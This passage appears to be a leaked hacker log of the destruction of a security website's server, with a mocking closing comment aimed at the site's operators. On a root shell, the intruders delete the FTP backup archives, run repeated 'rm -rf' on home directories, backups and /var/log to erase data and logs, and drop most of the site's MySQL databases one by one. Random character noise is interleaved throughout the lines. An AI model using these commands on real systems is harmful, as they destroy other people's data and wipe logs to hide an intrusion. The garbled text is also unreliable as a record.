-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
4 P& o1 A2 s" c$ W0 E: d0 S-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar& Y( i2 ?6 |( t% X& j* S# q
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar. u1 k4 r) C* d/ W o2 P; a8 P
[snip]7 M( H8 ^+ @0 U. y. t; Z* p( ?* j
226 Transfer complete.
; J: ~( \ F4 F% @; s) Y% f/ H2 Zftp> mdelete *
" Q+ E8 r% ?' i7 O9 G5 l6 W1 G2 wftp> ls -la
2 v! K! I8 B0 M$ X9 ^9 s227 Entering Passive Mode (212,254,194,163,2,193)6 M4 W7 T4 l2 T; }& Q
150 Opening BINARY mode data connection for ‘file list’.
Z. p2 A: v" X, b" N226 Transfer complete.
2 o0 Y, d* H" S- ?, {& }6 N4 qftp>
$ ^& C6 x, n; e$ d
( Z$ O5 A6 U" Z# K( ^sh-3.2# cd /home
" T9 ~- Q* U3 F3 N/ Osh-3.2# ls -la
/ I8 V7 G$ v4 _! Wtotal 120
3 }2 L U. y8 R3 o1 o# h8 ndrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
- e. s% w& _! E1 b3 _; fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. V. @. u+ U1 _drwx–x–x 9 admin admin 4096 Nov 28 2007 admin* K5 j4 s7 @# d+ V. L; B+ s2 g
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group: W) C" s' Y+ L- \9 m
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
1 v/ h$ S4 s% n4 H' xdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet8 ?' C; J2 D. o$ @3 }) ]
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup( M6 A# q6 d; O* h
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161, `- v; }* R/ m* W% {
drwx–x–x 10 com com 4096 Apr 28 12:40 com
) M' C* L* }$ rdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
9 e, a' Y# b m& t6 Y- Tdrwx—— 3 jon jon 4096 Sep 21 2007 jon* v9 i" a' y) k, L
drwx—— 2 root root 16384 Sep 11 2007 lost+found
8 {: O5 V( K: \* Tdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
" V3 F# B( _( g. odrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
7 ~ Y0 w% e0 f: odrwx—— 2 jon jon 4096 Sep 15 2007 test0 P4 J4 o" [, m
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
|; S' X5 W7 w/ A4 }2 l: ?5 v, `* H6 i+ |* E8 W2 r' G
sh-3.2# rm -rf backup/& l8 a2 R5 ^5 `5 T& {; `6 ]" x
sh-3.2# rm -rf backup.14161/
, V. M: H' R9 c* u# T/ f+ d. Msh-3.2# rm -rf ftp/
" i8 @4 T. F: W9 zsh-3.2# rm -rf jon/; |4 T- N% }- t6 U; h4 Z
sh-3.2# rm -rf my/ y' ]. U9 L& [
sh-3.2# rm -rf mysqldata/; d+ i9 i3 i {- I3 G
sh-3.2# rm -rf test/
) |+ m! [( G3 [. \9 ?& N5 Wsh-3.2# rm -rf tmp/7 `$ q) Z/ c# j$ L7 K4 Y
sh-3.2# cd ~
. P9 ^9 w0 K6 {; ^7 z3 Csh-3.2# rm -rf *
0 ]' k/ C! `' q7 m' `# z% lsh-3.2# rm -rf /var/log/
+ d0 y: ~$ w$ d: U0 y# vrm: cannot remove directory `/var/log//proftpd’: Directory not empty7 {8 u# @2 t$ K. L5 K# s: `9 I N/ K
sh-3.2# rm -rf /home/*
- }& |$ P0 h/ O2 }sh-3.2# mysql6 ]6 _) V. O' Q+ I* T
Welcome to the MySQL monitor. Commands end with ; or \g.. P7 C( @# u2 \3 U
Your MySQL connection id is 407156
2 I+ S5 @: p0 v8 R4 \& H2 g6 IServer version: 5.0.45-community-log MySQL Community Edition (GPL) S9 Z9 Y% w& I B# ^
6 P8 e! d6 r4 _" d! Q
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer./ R7 ?$ O, v$ M3 q6 H
3 T& V$ T& z! e3 @1 b$ _
mysql> show databases;
/ |6 F" M: a2 { s3 Q+———————–+
W: e4 o3 v1 k2 g+ N| Database |- T0 k1 a8 c$ D' j k" f* x
+———————–+
+ E7 ?# V& L5 K3 u+ B/ q| information_schema |1 I f' N- Z# r# Q$ Q
| astanet_ads |
7 G: g- L, m) k) O| astanet_mailing_lists |6 |# Z' X$ H! G8 D, l/ F
| astanet_mediawiki |- R' h* n7 ~( \. ~! m; s( ^' X& P" E
| astanet_membersystem |
& L$ f# F5 u( W$ r0 P| com_contrexx |
) X) L9 y8 F& z1 T' s| com_contrexx2 |
9 F! g- x, H; }& A& P E| com_contrexx2_live |/ _9 ` V4 F* ]# i) B
| da_roundcube |
- n$ ?) Y, k4 \| dolphin |
0 A1 x4 }' x- X; o3 \| ideapool |
( w; ^, [, A8 y+ d| mysql |
* r# L6 K: l) q$ b3 ~& o1 u| test |* U ^8 a, C8 \7 }
| yourmaster |
$ N$ D2 y T; V$ ^" \+ O* q- V+———————–+
" T0 n& j1 h/ f1 Z# U6 y. X) }$ G5 |14 rows in set (0.03 sec)
% \2 W+ I7 P9 U
8 p+ t9 G( f9 z5 \mysql> drop database astanet_membersystem;
& L: f& k; N, F K+ JdroQuery OK, 46 rows affected (0.81 sec)" s4 s2 E. @& |8 h1 g
6 G& [: t" g' K4 ?
mysql> drop database com_contrexx;
8 l5 f4 _# T' n* KQuery OK, 211 rows affected (2.72 sec)
( K" e: y. l8 h# V. }1 Q5 s* p5 n7 `, \" A# J' b* a9 j
mysql> drop database com_contrexx2;
1 ^4 L6 |1 ^/ K4 `# yQuery OK, 237 rows affected (2.23 sec)
1 x) m0 h T* c1 p3 C
# _9 W; O( b6 i$ Tmysql> drop database com_contrexx2_live;
* V' i' `+ G% c: S6 jQuery OK, 227 rows affected (7.63 sec)+ D. Z' d# F. X( u; S* F
, e/ a" d7 K& C% T! j8 h
mysql> drop database ideapool;
3 _- @8 ? ]" ~* u4 EQuery OK, 69 rows affected (0.19 sec). G( w0 J( Z3 N; z
7 o& p( H% O% X
mysql> drop database yourmaster;
3 T) s' e9 A, }5 u4 [, k8 @: UQuery OK, 158 rows affected (0.55 sec)
, K) R! x- ]& N" o# z& t
# b2 K0 `% V# x, ^, b4 ymysql> drop database astanet_ads;
& P: _, c' ~# V7 @% `* s& b* G0 wQuery OK, 9 rows affected (0.11 sec)
4 D1 [/ u4 b0 h& D, ^, t+ u/ u% m. D
mysql> drop database astanet_mailing_lists;9 F& Y( d" M3 v" {
Query OK, 24 rows affected (1.47 sec)
3 J" N" n: I& g
6 N- P6 w' q; v" h. Xmysql> drop database astanet_mediawiki;' m; D0 l/ f7 ^/ g9 R- x, E* N* S6 L
Query OK, 31 rows affected (0.51 sec)1 y, M5 K/ `' _# r0 X6 |
7 a0 d u6 h( n x% Nmysql> show databases;8 D7 S z' o4 @9 H
+——————–+. @/ K* i1 {" c) v
| Database |- c6 k& I! P* _' A1 n% d
+——————–+
% K- P+ d6 l' e4 ^7 q| information_schema |
1 g; A# l1 j( w/ [0 {| da_roundcube |
6 P. O$ i& j& z" U @6 t| dolphin |. j$ L& d/ [7 Y1 ~2 e: @1 W0 D" a% H
| mysql |: w- i& A. c/ r
| test |
, c# a, g# S1 }- O+——————–+
. x$ H. Y0 b1 t7 j. g5 rows in set (0.00 sec)
# w9 y. M! U* U' M" m* Q$ w/ M
! d" c8 s* {9 k8 SWhat a journey! We’re not sure exactly why the “Terminator” had any influence on! C. O9 r/ l+ I
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the
, A. }1 x- l* @$ [3 ?wrong to say this pack of morons *wont be back*.3 a& S3 a$ u% K( l& K( h0 C5 M" U
|